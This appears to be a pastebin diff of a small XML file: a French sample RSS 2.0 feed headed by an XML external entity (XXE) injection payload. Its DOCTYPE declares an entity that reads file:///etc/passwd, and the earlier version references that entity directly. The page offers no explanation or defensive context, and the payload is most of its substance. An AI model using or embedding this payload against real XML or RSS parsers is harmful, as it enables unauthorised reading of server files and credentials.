View difference between Paste ID: shxn5ehD and Unnmeizn
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="UTF-8"?>
2
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
3-
<foo>&xxe;</foo>
3+
4
    <channel>
5
        <title>Mon site</title>
6
        <description>Ceci est un exemple de flux RSS 2.0</description>
7
        <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
8
        <link>http://www.example.org</link>
9
        <item>
10
            <title>prout</title>
11
            <description>Ceci est ma première actualité</description>
12
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
13
            <link>http://www.example.org/actu1</link>
14
        </item>
15
        <item>
16
            <title>Actualité N°2</title>
17
            <description>Ceci est ma seconde actualité</description>
18
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
19
            <link>http://www.example.org/actu2</link>
20
        </item>
21
    </channel>
22
</rss>